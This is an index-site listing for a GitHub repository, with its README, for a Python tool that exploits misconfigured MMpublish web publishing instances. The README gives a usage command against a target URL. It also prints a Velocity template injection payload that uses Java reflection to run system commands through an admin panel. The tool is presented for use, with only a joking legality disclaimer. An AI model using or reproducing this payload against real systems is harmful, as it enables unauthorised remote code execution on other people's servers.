Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/incogbyte/mmpublish-scanner
Exploit miss configured mmpublish instances from "mmcafe.com.br"
https://github.com/incogbyte/mmpublish-scanner
Last synced: 18 days ago
JSON representation
Exploit miss configured mmpublish instances from "mmcafe.com.br"
- Host: GitHub
- URL: https://github.com/incogbyte/mmpublish-scanner
- Owner: incogbyte
- Created: 2020-07-20T13:27:22.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2022-12-08T11:12:08.000Z (about 2 years ago)
- Last Synced: 2023-04-24T02:23:26.985Z (over 1 year ago)
- Language: Python
- Size: 703 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Description
This tool exploits misconfigured instances of MMpublish a tool made by mmcafe.com.br
Use this tool for legal propose only :P.# Requirements
```
python3 >= python3.8
```# Install
```
pip3 install requirements.txt
```# Usage
```
python3 main.py -u https://target.com.br
```![img02.png](img02.png)
# If you got access to admin panel use the Velocity payload
```
#set($x='')##
#set($rt = $x.class.forName('java.lang.Runtime'))##
#set($chr = $x.class.forName('java.lang.Character'))##
#set($str = $x.class.forName('java.lang.String'))###set($ex=$rt.getRuntime().exec('whoami'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach( $i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
```